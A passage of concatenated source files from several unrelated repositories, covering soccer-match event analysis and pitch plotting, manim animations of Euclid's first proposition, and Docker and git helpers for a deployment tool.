ly3 = [0,16.5,16.5,0]
plt.plot(lx3,ly3,color=line,zorder=5)
#goals#
lx4 = [30.34,30.34,37.66,37.66]
ly4 = [104,104.2,104.2,104]
plt.plot(lx4,ly4,color=line,zorder=5)
lx5 = [30.34,30.34,37.66,37.66]
ly5 = [0,-0.2,-0.2,0]
plt.plot(lx5,ly5,color=line,zorder=5)
#6 yard boxes#
lx6 = [24.84,24.84,43.16,43.16]
ly6 = [104,99.5,99.5,104]
plt.plot(lx6,ly6,color=line,zorder=5)
lx7 = [24.84,24.84,43.16,43.16]
ly7 = [0,4.5,4.5,0]
plt.plot(lx7,ly7,color=line,zorder=5)
#Halfway line, penalty spots, and kickoff spot
lx8 = [0,68]
ly8 = [52,52]
plt.plot(lx8,ly8,color=line,zorder=5)
plt.scatter(34,93,color=line,zorder=5)
plt.scatter(34,11,color=line,zorder=5)
plt.scatter(34,52,color=line,zorder=5)
circle1 = plt.Circle((34,93.5), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle2 = plt.Circle((34,10.5), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=1,alpha=1)
circle3 = plt.Circle((34,52), 9.15,ls='solid',lw=1.5,color=line, fill=False, zorder=2,alpha=1)
## Rectangles in boxes
rec1 = plt.Rectangle((20, 87.5), 30,16.5,ls='-',color=pitch, zorder=1,alpha=alpha)
rec2 = plt.Rectangle((20, 0), 30,16.5,ls='-',color=pitch, zorder=1,alpha=alpha)
## Pitch rectangle
rec3 = plt.Rectangle((-1, -1), 70,106,ls='-',color=pitch, zorder=1,alpha=alpha)
ax.add_artist(rec3)
ax.add_artist(circle1)
ax.add_artist(circle2)
ax.add_artist(rec1)
ax.add_artist(rec2)
ax.add_artist(circle3)
def get_pitch_layout(title):
lines_color = 'black'
bg_color = 'rgb(255, 255, 255)'
pitch_layout = dict(hovermode='closest', autosize=False,
width=825,
height=600,
plot_bgcolor=bg_color,#'rgb(59,205,55)',
xaxis={
'range': [0, 100],
'showgrid': False,
'showticklabels': False,
},
yaxis={
'range': [0, 100],
'showgrid': False,
'showticklabels': False,
},
title=title,
shapes=[
{
'type': 'circle',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 40,
'y1': 65,
'x1': 60,
'line': {
'color': lines_color,
},
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 0,
'y1': 35,
'x1': 10,
'line': {
'color': lines_color,
},
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 10,
'y1': 65,
'x1': 10,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 65,
'x0': 10,
'y1': 65,
'x1': 0,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 100,
'y1': 35,
'x1': 90,
'line': {
'color': lines_color,
},
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 35,
'x0': 90,
'y1': 65,
'x1': 90,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 65,
'x0': 90,
'y1': 65,
'x1': 100,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 100,
'x0': 50,
'y1': 0,
'x1': 50,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 0,
'x0': 0,
'y1': 100,
'x1': 0,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 0,
'x0': 100,
'y1': 100,
'x1': 100,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 100,
'x0': 0,
'y1': 100,
'x1': 100,
'line': {
'color': lines_color,
}
},
{
'type': 'line',
'xref': 'x',
'yref': 'y',
'y0': 0,
'x0': 0,
'y1': 0,
'x1': 100,
'line': {
'color': lines_color,
}
},
]
)
return pitch_layout
def plot_invasion_and_acceleration_index(match_label, list_invasion, list_acceleration):
sns.set_style('ticks')
fig, ax = plt.subplots(2,1, figsize=(10,10), sharex=True)
print ('INVASION INDEX')
for i, c, label in zip(list(list_invasion),
['darkred','k'], ['AS Roma','ACF Fiorentina']):
df_invasion = pd.DataFrame(list_invasion[i], columns=['time','invasion'])
df_invasion['time'] = [x/60. for x in df_invasion.time]
print(label, round(df_invasion['invasion'].mean(), 2),
round(df_invasion['invasion'].std(), 2))
ax[0].plot(df_invasion.set_index('time').rolling(220, min_periods=1).mean(),c=c,alpha=0.7,lw=4,label=label)
ax[0].legend(loc=1,fontsize=18,frameon=True,shadow=True)
ax[0].grid(alpha=0.1)
ax[0].set_ylabel('invasion index',fontsize=25)
ax[0].yaxis.set_tick_params(labelsize=18)
ax[0].text(45.8,0.45,'half time',rotation=90,bbox=dict(facecolor='w',edgecolor='r',lw=2),
verticalalignment='center',horizontalalignment='left',fontsize=15,color='r')
ax[0].vlines(47,-1,2,colors='r',lw=2)
ax[0].text(6,0.45,'goal',rotation=90,bbox=dict(facecolor='w',edgecolor='rebeccapurple',lw=2),
verticalalignment='center',horizontalalignment='left',fontsize=15,color='rebeccapurple')
ax[0].vlines(7,-1,2,colors='rebeccapurple',lw=2)
ax[0].text(38,0.45,'goal',rotation=90,bbox=dict(facecolor='w',edgecolor='rebeccapurple',lw=2),
verticalalignment='center',horizontalalignment='left',fontsize=15,color='rebeccapurple')
ax[0].vlines(39,-1,2,colors='rebeccapurple',lw=2)
ax[0].text(85,0.08,'(a)',fontsize=25)
ax[0].set_ylim(0,0.55)
ax[0].set_title(match_label,fontsize=35)
print ('\nACCELERATION INDEX')
for i,c,label in zip(list(list_acceleration),
['darkred','k'],
['AS Roma','ACF Fiorentina']):
df_acceleration = pd.DataFrame(list_acceleration[i],columns=['time','acceleration'])
df_acceleration['time'] = [x/60. for x in df_acceleration.time]
print (label, round(df_acceleration['acceleration'].mean(), 2),
round(df_acceleration['acceleration'].std(), 2))
ax[1].plot(df_acceleration.set_index('time').rolling(220, min_periods=1).mean(),c=c,alpha=0.7,lw=4,label=label)
ax[1].legend(fontsize=18,frameon=True,shadow=True,loc=1)
ax[1].grid(alpha=0.1)
ax[1].set_ylabel('acceleration index', fontsize=25)
ax[1].xaxis.set_tick_params(labelsize=18)
ax[1].yaxis.set_tick_params(labelsize=18)
ax[1].text(85, 0.02,'(b)', fontsize=25)
ax[1].vlines(47, -1, 2, colors='r', lw=2)
plt.xlabel('time (min)', fontsize=25)
ax[1].yaxis.set_major_formatter(FormatStrFormatter('%.2f'))
plt.xlim(0,95)
ax[1].vlines(7,-1,2,colors='rebeccapurple',lw=2)
ax[1].vlines(39,-1,2,colors='rebeccapurple',lw=2)
plt.ylim(0,0.15)
fig.tight_layout()
plt.show()
```
#### File: jonpappalord/soccer_logs_exploration/utils.py
```python
import json
from tqdm import tqdm
from collections import Counter
import numpy as np
import operator
from matplotlib.ticker import FuncFormatter
import seaborn as sns
import pandas as pd
import networkx as nx
import base64
from collections import defaultdict
import sys,os
import math
import random
import operator
import csv
import matplotlib.pylab as pyl
import itertools
import scipy as sp
from scipy import stats
from scipy import optimize
from scipy.integrate import quad
import matplotlib.pyplot as plt
ACCURATE_PASS = 1801
EVENT_TYPES = ['Duel', 'Foul', 'Free Kick', 'Interruption',
'Offside', 'Others on the ball', 'Pass', 'Shot']
TOURNAMENTS=['Italy','England','Germany', 'France',
'Spain', 'European_Championship','World_Cup']
data_folder='data/'
def load_public_dataset(data_folder=data_folder, tournament='Italy'):
"""
Load the json files with the matches, events, players and competitions
Parameters
----------
data_folder : str, optional
the path to the folder where json files are stored. Default: 'data/'
tournaments : list, optional
the list of tournaments to load.
Returns
-------
tuple
a tuple of four dictionaries, containing matches, events, players and competitions
"""
# loading the matches and events data
matches, events = {}, {}
with open('./data/events/events_%s.json' %tournament) as json_data:
events = json.load(json_data)
with open('./data/matches/matches_%s.json' %tournament) as json_data:
matches = json.load(json_data)
match_id2events = defaultdict(list)
match_id2match = defaultdict(dict)
for event in events:
match_id = event['matchId']
match_id2events[match_id].append(event)
for match in matches:
match_id = match['wyId']
match_id2match[match_id] = match
# loading the players data
with open('./data/players.json') as json_data:
players = json.load(json_data)
player_id2player = defaultdict(dict)
for player in players:
player_id = player['wyId']
player_id2player[player_id] = player
# loading the competitions data
competitions={}
with open('./data/competitions.json') as json_data:
competitions = json.load(json_data)
competition_id2competition = defaultdict(dict)
for competition in competitions:
competition_id = competition['wyId']
competition_id2competition[competition_id] = competition
# loading the competitions data
teams={}
with open('./data/teams.json') as json_data:
teams = json.load(json_data)
team_id2team = defaultdict(dict)
for team in teams:
team_id = team['wyId']
team_id2team[team_id] = team
return match_id2match, match_id2events, player_id2player, competition_id2competition, team_id2team
def get_weight(position):
"""
Get the probability of scoring a goal given the position of the field where
the event is generated.
Parameters
----------
position: tuple
the x,y coordinates of the event
"""
x, y = position
# 0.01
if x >= 65 and x <= 75:
return 0.01
# 0.5
if (x > 75 and x <= 85) and (y >= 15 and y <= 85):
return 0.5
if x > 85 and (y >= 15 and y <= 25) or (y >= 75 and y <= 85):
return 0.5
# 0.02
if x > 75 and (y <= 15 or y >= 85):
return 0.02
# 1.0
if x > 85 and (y >= 40 and y <= 60):
return 1.0
# 0.8
if x > 85 and (y >= 25 and y <= 40 or y >= 60 and y <= 85):
return 0.8
return 0.0
def in_window(events_match, time_window):
start, end = events_match[0], events[-1]
return start['eventSec'] >= time_window[0] and end['eventSec'] <= time_window[1]
def segno(x):
"""
Input: x, a number
Return: 1.0 if x>0,
-1.0 if x<0,
0.0 if x==0
"""
if x > 0.0: return 1.0
elif x < 0.0: return -1.0
elif x == 0.0: return 0.0
def standard_dev(list):
ll = len(list)
m = 1.0 * sum(list)/ll
return ( sum([(elem-m)**2.0 for elem in list]) / ll )**0.5
def list_check(lista):
"""
If a list has only one element, return that element. Otherwise return the whole list.
"""
try:
e2 = lista[1]
return lista
except IndexError:
return lista[0]
def get_event_name(event):
event_name = ''
try:
if event['subEventName'] != '':
event_name = event_names_df[(event_names_df.event == event['eventName']) & (event_names_df.subevent == event['subEventName'])].subevent_label.values[0]
else:
event_name = event_names_df[event_names_df.event == event['eventName']].event_label.values[0]
except TypeError:
#print event
pass
return event_name
def is_in_match(player_id, match):
team_ids = list(match['teamsData'].keys())
all_players = []
for team in team_ids:
in_bench_players = [m['playerId'] for m in match['teamsData'][team]['formation']['bench']]
in_lineup_players = [m['playerId'] for m in match['teamsData'][team]['formation']['lineup']]
substituting_players = [m['playerIn'] for m in match['teamsData'][team]['formation']['substitutions']]
all_players += in_bench_players + in_lineup_players + substituting_players
return player_id in all_players
def data_download():
"""
Downloading script for soccer logs public open dataset:
https://figshare.com/collections/Soccer_match_event_dataset/4415000/2
Data description available here:
Please cite the source as:
<NAME>., <NAME>., <NAME>. et al. A public data set of spatio-temporal match events in soccer competitions.
Scientific Data 6, 236 (2019) doi:10.1038/s41597-019-0247-7, https://www.nature.com/articles/s41597-019-0247-7
"""
import requests, zipfile, json, io
dataset_links = {
'matches' : 'https://ndownloader.figshare.com/files/14464622',
'events' : 'https://ndownloader.figshare.com/files/14464685',
'players' : 'https://ndownloader.figshare.com/files/15073721',
'teams': 'https://ndownloader.figshare.com/files/15073697',
'competitions': 'https://ndownloader.figshare.com/files/15073685'
}
print ("Downloading matches data")
r = requests.get(dataset_links['matches'], stream=True)
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall("data/matches")
print ("Downloading teams data")
r = requests.get(dataset_links['teams'], stream=False)
print (r.text, file=open('data/teams.json','w'))
print ("Downloading players data")
r = requests.get(dataset_links['players'], stream=False)
print (r.text, file=open('data/players.json','w'))
print ("Downloading competitions data")
r = requests.get(dataset_links['competitions'], stream=False)
print (r.text, file=open('data/competitions.json','w'))
print ("Downloading events data")
r = requests.get(dataset_links['events'], stream=True)
z = zipfile.ZipFile(io.BytesIO(r.content))
z.extractall("data/events")
print ("Download completed")
``` |
{
"source": "jonparkdev/my-manim-animations",
"score": 3
} |
#### File: my_animations/Euclid/euclid_b1_p1.py
```python
from manimlib.imports import *
class SceneOne(Scene):
def construct(self):
self.title_sequence()
self.wait()
def title_sequence(self):
title = TextMobject("Euclid's Elements", fill_color=BLACK).scale(2)
book = TextMobject("Book ").scale(1.5)
proposition = TextMobject("Proposition ").scale(1.5)
book_number = Integer(13).scale(1.5).next_to(book, RIGHT)
proposition_number = Integer(465).scale(1.5).next_to(proposition, RIGHT)
book_group = VGroup(book, book_number)
proposition_group = VGroup(proposition, proposition_number).next_to(book_group, DOWN)
anim_group = VGroup(book_group, proposition_group).move_to(ORIGIN)
rules = TextMobject("Rules of the Game:").scale(1.2)
rule1 = TexMobject("\cdot \\text{ A claim is made asserting something to be true}").move_to(UP * .5 + LEFT * 5 , LEFT)
rule2 = TexMobject("\cdot \\text{ Straight edge and compass }").move_to(DOWN * .5 + LEFT * 5, LEFT)
rule3 = TexMobject("\cdot \\text{ Prove it!}").move_to(1.5 * DOWN + LEFT * 5, LEFT)
def animate_numbers(low_num, high_num, final_num):
def func(alpha):
if(alpha == 1):
return final_num
return np.random.uniform(low_num, high_num)
return func
self.play(Write(title), run_time=2)
self.wait(4)
self.play(FadeOut(title))
self.play(Write(rules), run_time=2)
self.play(ApplyMethod(rules.shift, 2 * UP + 3 * LEFT))
self.play(FadeIn(rule1))
self.wait(10)
self.play(FadeIn(rule2))
self.wait(10)
self.play(FadeIn(rule3))
self.wait(10)
self.play(FadeOut(rule1),FadeOut(rule2),FadeOut(rule3))
self.play(
ReplacementTransform(rules,anim_group),
)
self.play(
ChangingDecimal(book_number, animate_numbers(1, 13, 1)).set_run_time(3),
ChangingDecimal(proposition_number, animate_numbers(1, 465, 1)).set_run_time(4)
)
self.wait(1)
self.play(FadeOut(anim_group))
def scene_two(self):
pass
class Problem(Scene):
def construct(self):
self.move_line()
def move_line(self):
point_a = self.a = Dot(LEFT, color=BLACK)
point_b = self.b = Dot(RIGHT, color=BLACK)
line = self.initial_line = Line(point_a, point_b, stroke_width=6, color=BLACK)
self.wait()
self.play(FadeIn(line),FadeIn(point_a),FadeIn(point_b))
self.wait()
self.move_points()
def move_points(self):
np.random.seed(41)
movement_list_a = list(
zip(
np.random.random(3)*negative_or_positive(2),
np.random.random(3)*negative_or_positive(2),
[0, 0, 0,]
)
)
np.random.seed(42)
movement_list_b = list(
zip(
np.random.random(3)*negative_or_positive(2),
np.random.random(3)*negative_or_positive(2),
[0, 0, 0,]
)
)
count = 0
for a, b in zip(movement_list_a,movement_list_b):
if count % 2 == 0:
array_a = np.array(a) * -1
array_b = np.array(b) * -1
else:
array_a = np.array(a)
array_b = np.array(b)
count = count + 1
self.play(
ApplyMethod(
self.initial_line.put_start_and_end_on,
array_a,
array_b
),
ApplyMethod(self.a.move_to, array_a),
ApplyMethod(self.b.move_to, array_b)
)
self.wait()
length = self.initial_line.get_length()
left = self.a.get_center()
right = self.b.get_center()
positive_intersection, negative_intersection = get_circle_intersection(left, right, length, length)
if np.linalg.norm(positive_intersection) < np.linalg.norm(positive_intersection):
triangle_point = positive_intersection
else:
triangle_point = negative_intersection
triangle_point_mob= Dot(triangle_point, color=BLACK)
line_with_a= Line(self.a, triangle_point_mob, stroke_width=6,color=BLACK)
line_with_b= Line(self.b, triangle_point_mob, stroke_width=6, color=BLACK)
triangle = Polygon(
triangle_point,
left,
right
).set_stroke(color=None, width=0)
triangle.set_fill(BLACK, opacity = 0.5)
self.play(
FadeIn(triangle),
FadeIn(triangle_point_mob),
FadeIn(line_with_a),
FadeIn(line_with_b)
)
self.play(
FadeOut(triangle),
FadeOut(triangle_point_mob),
FadeOut(line_with_a),
FadeOut(line_with_b)
)
self.play(
ApplyMethod(
self.initial_line.put_start_and_end_on,
LEFT,
RIGHT
),
ApplyMethod(self.a.move_to, LEFT),
ApplyMethod(self.b.move_to, RIGHT)
)
self.wait()
self.play(Uncreate(self.initial_line))
self.wait()
# animations = [
# self.update_point_mob(self.a, movement) for movement in movement_list
# ]
# for anim in animations:
# self.play(anim)
class Construction(Scene):
CONFIG = {
"left_circle_center" : LEFT,
"right_circle_center" : RIGHT,
"random_seed" : 4,
"radius" : 2,
"point_color" : BLACK,
}
def construct(self):
self.initial_line()
def initial_line(self):
# create objects
radius_a = DashedLine(LEFT, RIGHT, color=BLACK)
radius_b = DashedLine(RIGHT, LEFT, color=BLACK).flip(LEFT)
positive_intersection, negative_intersection = get_circle_intersection(LEFT, RIGHT, self.radius, self.radius)
point_c = Dot(positive_intersection, color=self.point_color)
lower_point= Dot(negative_intersection, color=self.point_color)
line_ab = Line(LEFT, RIGHT, stroke_width=6, color=self.point_color)
circle_about_a = Circle(radius=self.radius, stroke_width=6,arc_center=LEFT, color=BYRNE_BLUE)
point_a = self.point_a = Dot(LEFT , color=self.point_color)
line_ac = Line(LEFT, point_c,stroke_width=6, color=BYRNE_YELLOW)
circle_about_b = Circle(radius=self.radius,stroke_width=6, arc_center=RIGHT, color=BYRNE_RED).flip()
point_b = Dot(RIGHT, color=self.point_color)
line_bc = Line(RIGHT, point_c,stroke_width=6, color=BYRNE_RED)
a_group = VGroup(
circle_about_a,
line_ac,
point_c,
line_ab,
point_b.copy(),
point_a,
)
copy_line_ab = line_ab.copy()
b_group = VGroup(
circle_about_b,
line_bc,
point_c.copy(),
point_a.copy(),
copy_line_ab,
point_b,
)
starting_line_ab = Line(point_a, point_b, stroke_width=6, color=BLACK)
self.add(starting_line_ab)
self.add(point_a)
self.add(point_b)
self.wait(3)
postulate = TextMobject("Postulate 3").move_to(2* UP)
self.play(Write(postulate))
self.wait(2)
self.play(FadeOut(postulate))
self.play(Uncreate(starting_line_ab))
self.wait(2)
# Construct circle about point A
self.play(ShowCreation(radius_a))
self.wait(2)
self.play(
ShowCreation(circle_about_a),
Rotating(radius_a, angle = 2*np.pi, about_point = LEFT),
rate_func = smooth,
run_time = 2,
)
self.play(ShowCreation(
radius_a,
rate_func = lambda t: smooth(1-t),
remover = True
))
# Construct circle about point B
self.play(ShowCreation(radius_b))
self.play(
ShowCreation(circle_about_b),
Rotating(radius_b, axis = IN, angle = 2*np.pi, about_point = RIGHT),
rate_func = smooth,
run_time = 2,
)
self.play(ShowCreation(
radius_b,
rate_func = lambda t: smooth(1-t),
remover = True
))
# Add initial line back
self.play(ShowCreation(line_ab))
self.wait(4)
self.play(FadeIn(point_c), FadeIn(lower_point))
self.wait(4)
self.play(FadeOut(lower_point))
self.wait(2)
# construct new lines
postulate1 = TextMobject("Postulate 1").move_to(3* UP)
self.play(Write(postulate1))
self.wait(2)
self.play(FadeOut(postulate1))
self.wait(2)
self.play(ShowCreation(line_ac))
self.wait(1)
self.play(ShowCreation(line_bc))
self.wait(4)
rotating_group = VGroup(line_ab, line_bc, line_ac, point_a, point_b, point_c)
about_point = rotating_group.get_center()
line_triangle = Line(about_point, DOWN, opacity=0)
move_group = VGroup(rotating_group, line_triangle)
self.play(FadeOut(circle_about_a), FadeOut(circle_about_b))
self.wait(5)
self.play(Rotating(rotating_group, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/3))
self.wait(.75)
self.play(Rotating(rotating_group, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/3))
self.wait(.75)
self.play(Rotating(rotating_group, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/3))
self.wait(.75)
self.play(Rotating(rotating_group, axis=UP, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(.75)
self.play(Rotating(rotating_group, axis=DOWN, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(.75)
self.play(Rotating(rotating_group, axis=RIGHT, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(.75)
self.play(Rotating(rotating_group, axis=LEFT, about_point=about_point,run_time=1, rate_func= smooth, radians=TAU/2))
self.wait(4)
self.play(FadeIn(circle_about_a), FadeIn(circle_about_b))
self.wait(3)
self.play(
ApplyMethod(a_group.shift, LEFT * 1.5),
ApplyMethod(b_group.shift, RIGHT * 1.5)
)
self.wait(2)
self.play(
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.play(
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7)
)
# compass animation
replaced_line_ab= line_ab.copy()
self.play(ReplacementTransform(line_ab, replaced_line_ab))
self.wait(5)
self.play(Uncreate(replaced_line_ab))
compass_point = point_a.get_center() + RIGHT * self.radius
compass_point_mob = self.compass_point_mob = Dot(compass_point, color=BLACK)
compass_line = self.compass_line = DashedLine(point_a.get_center(), compass_point_mob, color=BLACK)
line_ac_angle = (np.pi/2) - angle_of_vector(point_c.get_center() - point_a.get_center())
n_thetas = [-np.pi/2]*3 + [-line_ac_angle]
self.play(ShowCreation(compass_line))
self.play(FadeIn(compass_point_mob))
self.wait(1.5)
self.change_points(n_thetas , point_a.get_center())
# fade_lines = [FadeOut(line) for line, point in self.example_lines]
remove_example_lines = [FadeOut(mob) for mob in it.chain(*self.example_lines)]
self.play(*remove_example_lines)
self.remove_compass(n_thetas, point_a.get_center())
self.play(Uncreate(self.compass_line))
self.remove(compass_point_mob)
self.play(ShowCreation(line_ab))
self.play(
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.play(
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7),
)
self.wait(2)
self.play(
WiggleOutThenIn(copy_line_ab, rotation_angle=.05 * TAU, scale_value=.7)
)
self.play(
WiggleOutThenIn(line_bc, rotation_angle=.05 * TAU, scale_value=.7)
)
self.wait(3)
self.play(
ApplyMethod(a_group.shift, RIGHT * 1.5),
ApplyMethod(b_group.shift, LEFT * 1.5)
)
self.remove(copy_line_ab)
self.play(
WiggleOutThenIn(line_bc, rotation_angle=.05 * TAU, scale_value=.7),
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7),
)
self.play(
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.wait()
common_notion = TextMobject("Common Notion 1").move_to(3* UP)
self.play(Write(common_notion))
self.wait(4)
self.play(FadeOut(common_notion))
self.play(
FadeOut(circle_about_a),
FadeOut(circle_about_b)
)
a_group.remove(circle_about_a)
b_group.remove(circle_about_b)
self.wait(3.5)
self.play(
WiggleOutThenIn(line_bc, rotation_angle=.05 * TAU, scale_value=.7),
WiggleOutThenIn(line_ac, rotation_angle=.05 * TAU, scale_value=.7),
WiggleOutThenIn(line_ab, rotation_angle=.05 * TAU, scale_value=.7),
)
self.wait(2)
# self.play(
# ApplyMethod(a_group.shift, RIGHT * 1.5),
# ApplyMethod(b_group.shift, LEFT * 1.5)
# )
triangle = Polygon(
point_a.get_center(),
point_b.get_center(),
point_c.get_center()
).set_fill(
BLACK, opacity=.3
).set_stroke(
color=None, width=0
)
self.play(FadeIn(triangle))
self.wait(3)
qed= TextMobject("Being what is required to do.").next_to(a_group, DOWN*2)
self.play(Write(qed))
self.wait(2)
'''
Helper functions
'''
def get_compass_point_update(self, pm, d_theta, circle_center,func=smooth, run=1):
current_theta = angle_of_vector(pm.get_center() - circle_center)
new_theta = current_theta + d_theta
def update_point(point_mob, alpha):
theta = interpolate(current_theta, new_theta, alpha)
point_mob.move_to(circle_center + self.radius * (
np.cos(theta)*RIGHT + np.sin(theta)*UP
))
return point_mob
return UpdateFromAlphaFunc(pm, update_point, rate_func=func, run_time=run)
def get_compass_update(self, circle_center):
def update_compass(line):
point = self.compass_point_mob.get_center() - circle_center
line.rotate(
(angle_of_vector(point) - line.get_angle()),
about_point=circle_center
)
return line
return UpdateFromFunc(self.compass_line, update_compass, rate_func=smooth)
def change_points(self, n_thetas, circle_center):
self.example_lines = []
example_line = DashedLine(circle_center, self.compass_point_mob, color=BLACK)
example_point = Dot(self.compass_point_mob.get_center(), color=BLACK)
self.example_lines.append((example_line,example_point))
self.add(example_line, example_point, self.point_a)
for theta in n_thetas:
self.wait(.5)
self.play(
self.get_compass_point_update(
self.compass_point_mob, theta , circle_center
),
self.get_compass_update(circle_center)
)
example_line = DashedLine(circle_center, self.compass_point_mob, color=BLACK)
example_point = Dot(self.compass_point_mob.get_center(), color=BLACK)
self.example_lines.append((example_line,example_point))
self.add(example_line, example_point, self.point_a)
def remove_compass(self, n_thetas, circle_center):
# total_theta = -sum(n_thetas)
self.example_lines
theta = sum(n_thetas)
self.play(
self.get_compass_point_update(
self.compass_point_mob, -theta , circle_center
),
self.get_compass_update(circle_center),
)
def pop_lines(self, circle_center):
def pop(mobject, alpha):
point = angle_of_vector(self.compass_point_mob.get_center() - circle_center)
d_theta = (point+ np.pi)%(2*np.pi) - np.pi
print(d_theta, mobject.get_angle())
if point >= mobject.get_angle():
print('here')
FadeOut(mobject)
return mobject
return UpdateFromAlphaFunc(self.example_lines[3], pop,rate_func=smooth, run_time=1)
def get_point_mobs(self, origin):
points = np.array([
origin + rotate_vector(self.radius*RIGHT, theta)
for theta in np.random.uniform(np.pi/2, 7 * np.pi/8, size=3)
])
point_mobs = self.point_mobs = VGroup(*[
Dot().move_to(point) for point in points
])
point_mobs.set_color(self.point_color)
return point_mobs
def negative_or_positive(max_num):
return max_num * 1 if np.random.random() < 0.5 else -1 * max_num
def get_circle_intersection(origin_a, origin_b, r_1, r_2):
"""(numpy R^3 array, numpy R^3 array, float, float) -> numpy R^3 array
Returns the intersection point(s) of two circles given the origin
coordinates,origin_a and origin_b, of each circle and radii r_1, r_2
pre-conditions:
- The two given circles intersect at > 0 points
"""
# For now we will be working in 2D space and will ignore the z
# coordinate
x_1, y_1, z_1 = origin_a
x_2, y_2, z_2 = origin_b
"""
Our algorithm,
Strictly using algebraic equations of our circles,
(1) (x-x_1)^2 + (y-y_1)^2 = r_1^2
(2) (x-x_2)^2 + (y-y_2)^2 = r_2^2
Subtracting (2) from (1) and magically rearranging we get,
y = -[(x_1 - x_2)/(y_1 - y_2)]x +
[(r_1^2-r_2^2)-(x_1^2-x_2^2)-(y_1^2-y_2^2)] / (y_1 - y_2)
let v = [(r_1^2-r_2^2)-(x_1^2-x_2^2)-(y_1^2-y_2^2)] / -2 * (y_1 - y_2) so,
(3) y = -[(x_1 - x_2)/(y_1 - y_2)]x + v
Substituting our y back into (1) and some more algebra we get the
quadratic (if your thinking, that looks tedious, you are correct):
(x-x_1)^2 + (-[(x_1 - x_2)/(y_1 - y_2)]x + v - y_1)^2 = r_1^2
.
.
.
Some quadratic formula
Then use quadratic formula to solve for x, then use x in (3) to solve
for y
"""
# if origins of the two circles fall on the same axis
if y_1 == y_2 and x_1 == x_2:
raise ValueError("circles cannot be centred on the same origin")
elif y_1 == y_2:
# Denoting constant values in above formulas
constant = (y_1-y_2)/(x_1-x_2)
v = ((r_1**2-r_2**2)-(x_1**2-x_2**2)-(y_1**2-y_2**2)) / ((-2) * (x_1 - x_2))
root = 'y'
else:
# Denoting constant values in above formulas
constant = (x_1-x_2)/(y_1-y_2)
v = ((r_1**2-r_2**2)-(x_1**2-x_2**2)-(y_1**2-y_2**2)) / ((-2) * (y_1 - y_2))
root = 'x'
if (root == 'x'):
# quadratic formula to find roots along the x-axis
a = (1.0 + constant**2)
b = (-2) * (x_1 + (constant * (v - y_1)))
c = x_1**2 + (v - y_1)**2 - r_1**2
positive_x = ((-b) + np.sqrt(b**2 - 4*a*c)) / (2 * a)
negative_x = ((-b) - np.sqrt(b**2 - 4*a*c)) / (2 * a)
positive_y = (-constant) * positive_x + v
negative_y = (-constant) * negative_x + v
else:
# quadratic formula to find the roots along the y-axis
a = (1 + constant**2)
b = -2 * (y_1 + (constant * (v - x_1)))
c = y_1**2 + (v - x_1)**2 - r_1**2
y = (-b + np.sqrt(b**2 - 4*a*c)) / 2 * a
x = -(constant) * y + v
positive_y = ((-b) + np.sqrt(b**2 - 4*a*c)) / (2 * a)
negative_y = ((-b) - np.sqrt(b**2 - 4*a*c)) / (2 * a)
positive_x = (-constant) * positive_y + v
negative_x = (-constant) * negative_y + v
return [np.array((positive_x, positive_y, 0)), np.array((negative_x, negative_y, 0))]
``` |
{
"source": "jonparrott/noel",
"score": 3
} |
#### File: noel/builder/docker.py
```python
from noel.utils import call
def build(tag_name, context_dir):
call('docker', 'build', '-t', tag_name, context_dir)
def push(tag_name, use_gcloud=False):
"""Pushes an image to a repository.
Because Noel uses Google Container Registry, this has logic to use the
Google Cloud SDK to push the image. If you're not using GCR, you'll need
to make sure login is called before calling this.
"""
if not use_gcloud:
call('docker', 'push', tag_name)
else:
# When not on GCE/GKE, use gcloud to push. gcloud will handle
# authentication.
call('gcloud', 'docker', 'push', tag_name)
def login(host, token):
call('docker', 'login', '-e', '<EMAIL>', '-u', '_token',
'-p', token, host)
```
#### File: noel/builder/remote.py
```python
from noel.kubernetes import KubernetesError
from noel.utils import call
def get_ingress_ip(k8s, service_name):
"""Gets the public IP address of the service that maps to the remote
builder."""
service = k8s.get_service(service_name)
try:
return service['status']['loadBalancer']['ingress'][0]['ip']
except KeyError:
raise KubernetesError(
'Service {} does not have an external load balancer.'.format(
service_name))
def add_git_remote(remote_name, remote_url):
"""Adds a given remote to the repository in the current directory."""
call(
'git',
'remote',
'add',
remote_name,
remote_url)
def add_builder_git_remote(k8s, app, remote_name):
"""Adds the remote builder as a git remote to the repository in the current
directory."""
ip = get_ingress_ip(k8s, 'builder')
port = 2122
user = 'git'
url = 'ssh://{}@{}:{}/{}'.format(user, ip, port, app)
add_git_remote(remote_name, url)
```
#### File: noel/deployer/templates.py
```python
import yaml
from jinja2 import Template
from pkg_resources import resource_string
APP_SERVICE_TMPL = Template(
